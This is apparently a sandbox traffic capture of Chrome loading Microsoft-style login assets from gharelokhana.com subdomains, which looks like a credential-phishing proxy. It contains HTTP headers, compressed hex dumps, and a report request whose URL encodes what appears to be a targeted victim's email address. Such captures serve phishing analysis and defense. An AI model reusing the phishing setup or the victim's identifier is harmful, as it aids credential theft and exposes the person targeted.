                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:14 UTC336INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                access-control-allow-headers: content-type
                                                access-control-allow-credentials: false
                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                access-control-allow-origin: *
                                                2024-12-05 07:24:14 UTC12INData Raw: 37 0d 0a 4f 50 54 49 4f 4e 53 0d 0a
                                                Data Ascii: 7OPTIONS
                                                2024-12-05 07:24:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.549862164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:13 UTC688OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/css,*/*;q=0.1
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: style
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:15 UTC790INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:14 GMT
                                                Content-Type: text/css
                                                Content-Length: 20410
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Fri, 08 Nov 2024 04:59:25 GMT
                                                etag: 0x8DCFFB21E496F3A
                                                x-ms-request-id: ede79dfd-801e-0004-1ca9-4471fc000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072414Z-15b54885d96b2wtthC1FRAycng00000007ng000000008xgy
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:15 UTC15594INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 52 eb c9 4a 8c 48 3d 47 53 49 ad e3 78 93 39 c7 af b2 9d 7d 54 2a b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab a3 ff 7e f1 46 03 68 90 d4 78 b2 d9 7b 2b eb 8d 2d a2 1b 0d a0 d1 68 a0 81 6e e0 eb af fe 10 3c 2f 76 f7 65 76 b3 ae 83 a7 cf cf 83 57 d9 a2 2c aa 62 55 93 f4 72 57 94 49 9d 15 db 30 78 96 e7 01 43 aa 82 32 ad d2 f2 36 5d 86 c1 57 5f 7f fd d5 1f 9e f4 bb ff 2f 78 ff e1 d9 bb 0f c1 9b bf 04 1f 7e bc 7a f7 7d f0 96 7c fd 23 78 fd e6 c3 d5 f3 17 41 67 2a 4f 9e 7c 58 67 55 b0 ca f2 34 20 ff 5e 27 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4e f3 e2 2e 78 4a c8 95 cb e0 6d 52 d6 f7 c1 d5 db f3 30 f8 40 70 0b d2
                                                Data Ascii: }k6wRJH=GSIx9}T*)Qf<~Fhx{+-hn</vevW,bUrWI0xC26]W_/x~z}|#xAg*O|XgU4 ^'UmPA]ZU!Y:ve?!dN.xJmR0@p
                                                2024-12-05 07:24:15 UTC4816INData Raw: 78 ce 2b 2b 6e 13 d6 17 0b 8b ca ba c2 a2 2a 8b 88 bd ac 2c 12 31 2f 2a 2b 24 e5 a1 95 75 9e df 51 bb 5f 6a 19 63 dc bc c9 45 89 b5 70 47 5d 70 ca fb 9e 0e 20 56 49 be 20 69 14 01 46 49 a3 08 a2 a9 10 de 51 33 ab ab 42 ad 3a 03 51 82 c9 86 58 21 80 b6 66 35 88 5b 0b 1a d2 44 af 18 0e 06 e3 65 32 71 db a4 25 ce 20 03 a5 0f 01 b4 b6 c9 2f 95 2d 68 58 9b 7c d2 ca db f4 30 61 ec 73 a7 f6 1e b8 a8 5b 0e 36 f1 85 8e 36 04 a6 86 1b 02 93 e3 0d 14 66 70 df 93 6e 56 08 83 b4 76 40 43 45 db f0 b0 2e 10 57 99 1b 46 0a 7a 9a 6c 5e eb 5b 91 85 43 fa 34 bc 98 9d 23 97 02 03 20 96 48 ba 89 37 5f 87 50 e3 87 e3 60 22 80 5b d9 23 19 93 28 7f 18 bb 0c ee 13 f6 9e b3 cc 4f 7d b0 93 e5 be fa 81 1c e1 db 81 87 f8 c3 85 9e 97 26 d9 ad e4 e2 f9 d0 f9 26 d9 66 bb 7d ce d8 eb 5e
                                                Data Ascii: x++n*,1/*+$uQ_jcEpG]p VI iFIQ3B:QX!f5[De2q% /-hX|0as[66fpnVv@CE.WFzl^[C4# H7_P`"[#(O}&&f}^


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.549863164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:13 UTC665OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:15 UTC813INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:15 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 122366
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Fri, 01 Nov 2024 20:24:27 GMT
                                                etag: 0x8DCFAB32EE49129
                                                x-ms-request-id: e4f281ed-301e-000a-184b-46105e000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072414Z-15b54885d96jbrdnhC1FRAfgvc00000002yg000000003279
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:15 UTC13647INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 7b 57 e3 b8 b2 38 fa ff fd 14 c1 7b 5f 26 19 4c 3a ce 8b c4 b4 87 13 02 74 b3 07 08 43 a0 67 f6 a1 d9 2c c7 56 82 07 c7 ce b1 1d 1e 3b e4 7c f6 5f 55 49 b2 e5 c4 a1 bb e7 9c 75 ef ba eb ee 47 13 4b a5 57 a9 54 aa 2a 95 4a 1f 7e de fa bf 4a 3f 97 76 bf ff 3f a5 e1 75 ef ea ba 34 38 29 5d 7f 3e bd 3a 2a 5d c2 d7 3f 4b 17 83 eb d3 fe f1 f7 d7 83 8d e2 ff af 1f bc b8 34 f6 7c 56 82 bf 23 3b 66 6e 29 0c 4a 61 54 f2 02 27 8c 66 61 64 27 2c 2e 4d e1 df c8 b3 fd d2 38 0a a7 a5 e4 81 95 66 51 f8 27 73 92 b8 e4 7b 71 02 85 46 cc 0f 9f 4b 65 a8 2e 72 4b 97 76 94 bc 96 4e 2f 2b 55 a8 9f 41 6d de c4 0b a0 b4 13 ce 5e e1 f7 43 52 0a c2 c4 73 58 c9 0e 5c aa cd 87 8f 20 66 a5 79 e0 b2 a8 f4 fc e0 39 0f a5 73 cf 89 c2 38 1c 27 a5 88 39
                                                Data Ascii: {W8{_&L:tCg,V;|_UIuGKWT*J~J?v?u48)]>:*]?K4|V#;fn)JaT'fad',.M8fQ's{qFKe.rKvN/+UAm^CRsX\ fy9s8'9
                                                2024-12-05 07:24:15 UTC16384INData Raw: 4a d1 01 55 6c e2 6a 5a af 9e 7c da 9c d0 d7 7d cb 39 d0 f6 63 b4 b6 32 0d e8 5e 9f f3 01 0a cf 48 e9 2d 96 3d 2f ee 28 af 06 f2 39 80 bd 77 4c 61 19 ca da a2 b6 b4 4a 90 8f 87 1b 56 75 61 2c f7 67 40 9e d6 a2 be dc e7 34 09 c4 d9 58 2e 9a cb 45 6b a9 e9 5c fd 3e ae 66 e4 aa fb fa 5c 31 88 fc 8f eb f7 8a ea 5f ea cf 91 97 ac f3 6f dd d6 43 61 10 58 f0 27 d5 c2 03 40 2d 22 c5 b7 94 53 1f 6c 5c 99 92 7d 10 38 7d fa 86 a5 5d d3 cf a1 43 d5 a9 fd 02 3f 7d f9 d2 7c bd c2 39 d6 dc 72 77 7c ce 02 a9 e4 71 95 7a 82 c6 71 ba 56 6b ab dd 39 a0 79 b8 e4 eb 13 3b 5f e6 67 ef fa 5c 74 52 8c 23 5f 7a 75 54 72 4c 3e 99 ad 39 6f ad 1c 0b 85 06 60 c2 ca 3e bd cb 9d 3d 49 68 79 c0 be 48 76 16 72 63 46 c8 62 14 fa cc b2 81 68 24 c6 81 f8 10 47 63 44 97 9c 1b 6d 27 c4 b4 89
                                                Data Ascii: JUljZ|}9c2^H-=/(9wLaJVua,g@4X.Ek\>f\1_oCaX'@-"Sl\}8}]C?}|9rw|qzqVk9y;_g\tR#_zuTrL>9o`>=IhyHvrcFbh$GcDm'
                                                2024-12-05 07:24:15 UTC16384INData Raw: 51 e0 92 3a 0b 44 c3 34 73 86 c0 a7 21 c3 03 1c d2 0e 81 69 1e a8 e3 d4 ff 3d ea 3e 06 f2 a5 a7 65 74 61 44 3f 64 03 d2 85 ec 8c c7 48 19 dc 44 0f 90 03 55 2a 93 34 cb f8 84 d9 0b c6 b8 5e c4 eb 99 57 5f 18 5c c9 a4 ab 81 ff 4a 4d f9 dd 3c ca 7d ed 7b 2d ab b0 63 1b b1 1d db 8c 62 fc 41 c6 0f 51 1e a0 57 96 3f 45 bd e3 9e 96 d2 35 1f 3d d4 f1 92 5f 8d 79 f2 c2 71 5c 89 42 67 df b9 3d f7 0a 29 60 bc 8f 16 de 2e 2e be 83 39 b8 69 e2 88 ba 6f fc 82 d5 c0 35 7b e0 4f 9b 25 e2 97 18 19 fb 57 f7 13 14 81 14 1b c6 41 58 99 13 08 21 42 f8 8a d5 35 a7 b3 83 94 02 c7 d2 3e 49 4d 3c 61 5b 60 75 4c a2 0a 6d 54 20 c8 21 3d 18 11 39 48 26 7e 30 42 f3 72 09 aa 31 6a de c2 0e 08 86 84 44 f8 7c 88 04 77 57 f4 62 6d a5 da 8b dc 5e db 66 c0 a3 5d c6 02 db 03 6a 48 ca 08 ec
                                                Data Ascii: Q:D4s!i=>etaD?dHDU*4^W_\JM<}{-cbAQW?E5=_yq\Bg=)`..9io5{O%WAX!B5>IM<a[`uLmT !=9H&~0Br1jD|wWbm^f]jH
                                                2024-12-05 07:24:15 UTC16384INData Raw: 97 c7 f7 5f 6a de bf 8b f2 7d 20 85 60 a1 e7 9f 70 7c b8 19 cd af fd 6a d6 03 56 5d 70 86 9d ea fb 0f c1 98 df 7d a8 a9 e7 04 0e c8 9d d1 88 33 1c d5 64 60 10 1a f4 7e e5 3c 27 e6 58 28 49 a5 68 e0 5e e9 35 ad 06 be 9b 8e 27 2c 0c 12 43 66 66 64 99 34 bf e2 df c6 eb 01 ed f4 03 de f6 e1 e7 38 bf c6 80 64 27 a9 1c e2 9f cd 71 81 6b 09 e6 e7 96 cf 07 31 09 66 0e 3e 22 d4 d0 bc 33 5b 33 8e a2 9b 63 65 02 cf 59 7a 66 01 b8 d7 b0 0d fc f2 d8 6c 2e dd 0e c5 db 23 f3 6d 9d 11 28 67 dc 35 f2 a9 03 b3 28 e9 da 6c c4 84 8c 22 78 5e cc 3a f2 74 38 1c 45 fb e9 2d ce cd 5e 96 ed 21 11 cc 39 df 98 b3 6c 30 9f 94 e1 ad 99 61 9a 7c 9d 04 e3 f2 70 0c 6a 86 d3 d8 13 27 e6 5a 0a c9 26 d0 5c 4b 47 e6 a8 e3 86 85 b9 df 63 5b 73 31 22 aa 2d d4 0a 55 b7 bc 72 35 15 1e f2 ec 40
                                                Data Ascii: _j} `p|jV]p}3d`~<'X(Ih^5',Cffd48d'qk1f>"3[3ceYzfl.#m(g5(l"x^:t8E-^!9l0a|pj'Z&\KGc[s1"-Ur5@
                                                2024-12-05 07:24:15 UTC16384INData Raw: 6e 1f 6a 94 d9 a8 95 11 52 51 2b 42 9c 88 2b f8 5b 8f 40 44 cd 78 6f bc 67 c4 0b b6 60 3a 0a 34 cf 1e 63 3d 9a 7e 83 7e cc 7c a0 8f 82 2d 17 47 2f 78 63 fd cd 6a 95 f2 5a 40 d6 09 e8 6f 92 69 6c 3c 69 6c d7 dd 4e af 89 5a b2 45 4e dd 54 0e 4c 6a 29 27 10 f9 7e e6 2d 82 46 45 91 2d 9a 66 d5 42 50 f4 11 12 30 d2 e8 34 49 e1 94 ba 12 e0 49 f6 f4 69 a6 08 a8 16 17 21 1a 0c dc 6c a9 66 51 ab 4f 62 76 a1 f5 b3 87 87 88 4f 1c f9 32 f4 0c d2 56 98 15 74 41 d8 69 6b f5 7f 59 76 84 6f 53 77 03 18 11 68 d6 29 58 ce 3c f6 90 cd dc e9 9f 11 2c bb 2b ea a8 46 81 b7 33 14 c2 bd ed d1 03 4f c8 c7 c5 53 99 4a 4d a7 12 04 ad 7f ad e7 8a 9f 84 44 48 53 4e 06 ab 24 46 f8 27 4f a3 3b a8 1f 56 d9 a5 cf be 8b 05 03 5b 64 22 fa 9a fa 23 ae 48 4b 2e 97 c9 78 1c a7 8f 38 b0 a8 86
                                                Data Ascii: njRQ+B+[@Dxog`:4c=~~|-G/xcjZ@oil<ilNZENTLj)'~-FE-fBP04IIi!lfQObvO2VtAikYvoSwh)X<,+F3OSJMDHSN$F'O;V[d"#HK.x8
                                                2024-12-05 07:24:15 UTC16384INData Raw: c9 07 b2 c8 a6 34 27 74 6f 15 a8 a6 f3 6c a9 db 67 66 2a 29 60 bb dd 17 b3 f9 a6 96 47 1f 84 3a 38 ba 47 cd af 58 f8 3d 85 97 59 55 5a e9 96 86 54 77 64 6d 88 04 ed 2b 7b 39 b2 68 66 57 76 b8 d1 fe 77 93 0f f5 a5 6f 07 f2 b2 0e 1e 15 aa 62 5a cb b6 c9 e6 a6 4d ae 9d 6b 07 ba d5 e4 be bc ec 6e 4d 27 b4 be bb 7b f7 bb e5 3d 74 97 fd 87 d3 b5 77 a4 f5 c2 24 34 bc 22 1b e2 c8 3a a3 e3 0d ff 9a 3c ec dc ac 7d 36 83 02 c0 84 68 0e b9 1f a1 24 d9 ba 3f d0 5b 95 63 aa f9 74 6c 0d ce 20 d0 61 0b 0d ac 7f cf 96 59 12 fb 7d 21 87 c3 ab d3 2c 2e ac ff 6b 3d 1b 37 e6 d5 c8 fa 9f c9 0f 14 00 f7 e6 e4 e8 ec a4 15 4f 6a fd 5f a9 6e 03 c1 e2 89 91 0e 40 d2 37 9f 82 df fc ac 34 a6 73 b4 f6 62 5c 9f 52 5a de 39 d4 b9 70 e7 63 53 80 6e 30 a5 5d 33 bc 39 aa 9e aa c8 24 a5 df
                                                Data Ascii: 4'tolgf*)`G:8GX=YUZTwdm+{9hfWvwobZMknM'{=tw$4":<}6h$?[ctl aY}!,.k=7Oj_n@74sb\RZ9pcSn0]39$
                                                2024-12-05 07:24:15 UTC16384INData Raw: fa b0 1e df 83 f5 2e 1f 00 9e 72 de ee b2 e9 c0 54 ae 45 e5 c1 6c 5d d4 ac f7 b8 cc 30 dd 5d ae 0d 06 dc fa a6 9f 12 c1 c7 2d 83 78 d0 63 24 d3 65 0e 9d b8 25 55 eb 69 7d 10 75 b0 d9 1e 3b af 8b f4 37 70 6c 0c db 35 7b b9 bf fc c3 b6 9b d3 d4 51 c9 45 97 ef 1f 0d 47 fd 95 0b 71 05 9c da 05 4b f5 f0 ab 53 ed 0d 85 fd 5f 69 9a 77 fc bd e4 74 eb 6d 67 76 f5 44 ad e9 47 7d 6d 28 cf ef 27 c6 bd 5a 87 72 67 52 a5 c1 39 1d f2 da 3c 01 a4 fd d4 f3 be da 84 9c bd b9 02 f2 b6 83 ba af 36 39 d4 db 30 93 97 9d de d5 f0 2a af fb 5a 05 e3 b4 bf f6 d4 b7 2b 5d d1 ee cf b7 5c cd ba b5 1e d9 64 86 b3 31 44 ef 93 fd 10 a6 72 49 1e 92 8f 1f 07 fb 83 9e 3e da cb dc 2f 49 7a bb 69 ef 0a 3c 6a 42 5d eb ab 0e da f1 bd c3 2b 3c 2a 9d 46 26 ea 0c d1 ea 2e 65 6d e4 f6 6c 4d de c1
                                                Data Ascii: .rTEl]0]-xc$e%Ui}u;7pl5{QEGqKS_iwtmgvDG}m('ZrgR9<690*Z+]\d1DrI>/Izi<jB]+<*F&.emlM
                                                2024-12-05 07:24:15 UTC10415INData Raw: 1d 7e 58 17 1f 24 64 c8 3b 6e 24 7f 2c 55 59 fd ff b7 d7 b3 79 9d c5 9b 73 92 52 23 6e 8b 47 83 69 39 04 4f b5 b3 7b 12 c7 9f 5b 69 84 e6 33 54 fe 5a 6f ec 38 b6 d3 28 6e f9 71 74 d3 9a 47 09 d6 a0 31 5a 8a e1 af 38 4a dc 40 4b fc f0 bb 88 17 3c 7b 35 b3 0c d6 62 05 a7 5e 6c 05 65 69 05 d5 96 ae 85 08 19 fc 35 d4 98 f1 8e 67 c7 f3 79 b0 48 82 24 bf 3c 56 40 22 61 c1 de a5 9a 23 08 dd 36 ea 1e bb d5 9b f8 9d 6e 2f 8d ce d3 18 83 ff 74 0b 87 d4 39 ac f6 19 30 5e f3 11 17 5c 2b 9b b0 71 2d 4c 5c 8d 85 3c 8e 75 43 81 7b a1 e8 3d d0 b3 d7 eb 31 0c ad 37 8e a9 c2 e8 88 bb 37 af c8 95 3d 67 da 12 80 fb 24 04 75 82 a0 b2 93 eb 3a 2a 2c 97 5b 39 8d 1c c2 03 43 f2 9b c4 68 e8 45 45 99 6a 45 a5 22 ef c2 c0 0f 88 27 4a d4 e4 bf be a4 fa de 9e 6b 53 cc aa 45 db 15 49
                                                Data Ascii: ~X$d;n$,UYysR#nGi9O{[i3TZo8(nqtG1Z8J@K<{5b^lei5gyH$<V@"a#6n/t90^\+q-L\<uC{=177=g$u:*,[9ChEEjE"'JkSEI


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.549861164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:13 UTC684OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:15 UTC812INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:14 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 16345
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                etag: 0x8DCF55E3D91C34E
                                                x-ms-request-id: 5d94a772-a01e-004d-7ad0-440cba000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072414Z-15b54885d96tt466hC1FRAvn9s000000075000000000raub
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:15 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c1 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 9b b5 3f 8d bd c0 df 13 fb 8f ea 77 21 d8 f3 f7 1f bd 9b 3d ef 47 ff e7 fd 50 c4 eb d0 2f e0 ef 92 f8 b4 0a c2 38 7a f5 d1 0d 0b 71 03 5f 35 1e e5 bb fa e3 67 c7 9b d5 7d 67 11 b8 33 31 ab ff a1 f2 f9 95 6c 2a b0 e9 d4 5d 2c f6 62 d5 83 13 3b c9 ef 60 1f 1e b8 59 e3 0f e5 a4 e0 33 0e e3 35 1e 75 47 41 69 d9 10 4e 50 9a 36 3c f8 77 d5 28 16 9d 60 af bc ff 79 ef c7 64 1a 4e e0 78 00 fc 5e 75 9f a0 f4 1b de 5e 05 fa 87 3f 87 fb 4e 08 7f 8e f6
                                                Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo?w!=GP/8zq_5g}g31l*],b;`Y35uGAiNP6<w(`ydNx^u^?N
                                                2024-12-05 07:24:15 UTC773INData Raw: e8 04 1b c0 7a 77 4c f1 70 ee 03 7e b9 52 66 00 e0 2d 4b 19 b6 30 82 b4 8c 07 10 e2 6a 41 51 4f 3c 0d 86 9c fb 90 51 1e b8 7e 38 ef ac ca 5b ce 0d e6 a8 e8 40 1c 3c 54 74 00 12 3d d5 58 6e a1 df 32 fc 96 7e 1f e6 a4 0f c0 6d c1 20 4b f4 e5 94 23 08 f2 7a 2b a7 b0 22 f9 95 e1 1b bc 5a 63 78 0f a0 e3 c1 92 39 86 02 bf 1f 40 12 07 fe c0 04 ed 43 f1 51 60 30 01 9f 99 b9 11 22 9c 9c 46 f5 21 03 4e d8 91 99 23 47 70 69 f5 43 13 bf cf 2b a3 5b 30 aa 4d 00 19 ad 61 59 30 a3 07 1c ad 07 46 55 f6 20 7e 60 b4 50 c6 37 58 14 8d 87 24 dd 1a 60 1d ef 0e ff 78 de 3c 3f 3d 3f 29 da 42 15 9f 5b 3c cd 11 b4 5f 48 e5 b0 5e 8c 8c 27 d8 05 98 35 59 15 2d 93 07 3e a7 63 10 ab 63 49 07 c0 d2 95 1b 8e 96 fc d4 b9 0c ab 80 76 df 91 f7 17 e2 c7 c6 08 08 ae 98 e1 2e 77 5a 67 fd 21
                                                Data Ascii: zwLp~Rf-K0jAQO<Q~8[@<Tt=Xn2~m K#z+"Zcx9@CQ`0"F!N#GpiC+[0MaY0FU ~`P7X$`x<?=?)B[<_H^'5Y->ccIv.wZg!


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.549869164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:15 UTC370OUTPOST /api/report?catId=GW+estsfd+SEC HTTP/1.1
                                                Host: 4b553e95-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                Content-Length: 586
                                                Content-Type: application/reports+json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:15 UTC586OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 33 33 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6a 64 6a 6b 64 6c 65 6c 6c 65 6b 6b 66 66 2e 67 68 61 72 65 6c 6f 6b 68 61 6e 61 2e 63 6f 6d 2f 3f 6b 6d 3d 61 32 78 68 64 58 4d 75 62 57 46 6b 5a 58 4a 41 63 32 4a 76 4c 6d 4e 76 4c 6d 46 30 25 43 33 25 38 33 25 43 32 25 41 33 25 43 33 25 41 32 25 43 32 25 38 32 25 43 32 25 41 43 25 43 33 25 41 32 25 43 32 25 38 30 25 43 32 25 39 41 24 24 24 25 43 33 25 38 33 25 43 32 25 41 33 25 43 33 25 41 32 25 43 32 25
                                                Data Ascii: [{"age":0,"body":{"elapsed_time":2330,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%
                                                2024-12-05 07:24:16 UTC367INHTTP/1.1 429 Too Many Requests
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:16 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                request-context: appId=cid-v1:20c536d6-d891-4743-bdc8-f66a2e341114
                                                access-control-allow-credentials: false
                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                access-control-allow-origin: *
                                                2024-12-05 07:24:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.549874164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:16 UTC565OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:17 UTC812INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:17 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 16345
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                etag: 0x8DCF55E3D91C34E
                                                x-ms-request-id: 5d94a772-a01e-004d-7ad0-440cba000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
